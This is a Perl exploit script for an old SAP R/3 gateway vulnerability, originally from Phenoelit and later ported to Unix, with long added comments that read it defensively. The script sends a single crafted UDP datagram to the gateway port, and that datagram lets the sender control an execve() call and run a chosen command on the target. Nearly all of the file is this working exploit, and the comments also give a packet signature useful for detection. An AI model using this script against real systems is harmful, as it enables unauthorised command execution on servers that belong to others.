#!/usr/bin/perl -w
use IO::Socket;

# Unix version of the FX SAP R/3 gwrd vuln.
#
# We partially control a call to execve() made by lnaxdm/sapsys
# Easily exploitable with local access
# Could be done remotely under some conditions
#
# 2003, FX of Phenoelit (Win32 original code)
# 2005, Nicob (Unix version)
#
# Reviewer notes (defensive reading of this script):
#  - Usage: <command> <arg1> <arg3> <host> [port]. Inputs come from @ARGV
#    and are checked only for presence and (arg1/arg3) an 8-byte cap. The
#    file runs without `use strict`, so $command, $param1, $param3, $host,
#    $port and $request are package globals; send_UDP() below reads
#    $request directly rather than taking it as a parameter.
#  - Everything the script does on the wire is one UDP datagram to the
#    gateway port (3317 unless overridden). The body has a fixed layout:
#    0x01 0x02, fifty 'B' (0x42) bytes of padding, an 8-byte space-padded
#    field, the marker "_0_0_0_0_0_", a second 8-byte space-padded field,
#    the marker "_1_1_1_1_1__2_2_2_2_2", then a NUL-terminated string.
#    A datagram to the gateway port that starts 0x01 0x02 followed by a run
#    of 0x42 bytes is the observable artefact of this technique.
#  - The affected component is named here only as lnaxdm/sapsys; the
#    remedy is the vendor fix for this 2003 issue together with keeping
#    the gateway port unreachable from untrusted networks. The script
#    never reads a reply, so it cannot tell whether anything happened.

$|=1;    # unbuffers STDOUT; nothing below prints to STDOUT (the only print goes to the socket)

# Positional arguments. "arg1"/"arg3" follow the original author's numbering
# of the execve() arguments (see the payload comments below). Both are capped
# at 8 bytes because each is written into an 8-byte field and space-padded.
# Because the assignment sits inside `unless`, an empty or "0" value is
# treated the same as a missing one.
die "Give filename" unless ($command=shift);
die "Give arg1" unless ($param1=shift);
die "Give arg3" unless ($param3=shift);
die "Arg1 too long" if (length($param1) > 8);
die "Arg3 too long" if (length($param3) > 8);
die "Give host" unless ($host=shift);
# Optional fifth argument; the author's default is port 3317. Same caveat:
# a literal "0" is replaced by the default.
$port="3317" unless ($port=shift);

# Datagram body. Field positions are fixed by the padding and marker
# strings; the two space-padded fields are exactly 8 bytes each.
$request = "\x01".
"\x02".
"BBBBBBBBBB".
"BBBBBBBBBB".
"BBBBBBBBBB".
"BBBBBBBBBB".
"BBBBBBBBBB".
# Second arg to execve()
# 8 chars long
$param1.
" " x (8 - length($param1)).
"_0_0_0_0_0_".
# Fourth arg to execve()
# 8 chars long
$param3.
" " x (8 - length($param3)).
"_1_1_1_1_1__2_2_2_2_2".
# First arg to execve()
# Unlimited length, end with %00 (a NUL byte, "\x00")
$command."\x00";

# Fire-and-forget: no response is read before exiting.
# (`&send_UDP(...)` is legacy call syntax; `send_UDP(...)` is equivalent here.)
&send_UDP($host,$port);
exit 0;

# send_UDP($dest, $port)
# Opens a UDP socket to $dest:$port, writes the file-level global $request
# to it and closes the socket; the return value is whatever close() returns.
# Dies if the socket cannot be created. The die message omits $@ and $!,
# which is where IO::Socket::INET reports the reason for the failure.
# $rline is declared but never used, and the lexical $port shadows the
# file-level $port (harmless: the value arrives through @_).
sub send_UDP {
    my $remote; my $rline; my $dest; my $port;
    ($dest,$port) = @_;
    # PeerPort is stringified; IO::Socket::INET accepts a numeric port here.
    $remote = IO::Socket::INET->new(Proto=>"udp",PeerAddr=>$dest,PeerPort=>"$port",);
    unless ($remote) { die "cannot get socket for $dest" }
    $remote->autoflush(1);
    # Single datagram carrying the payload built at file level.
    print $remote $request;
    close $remote;
}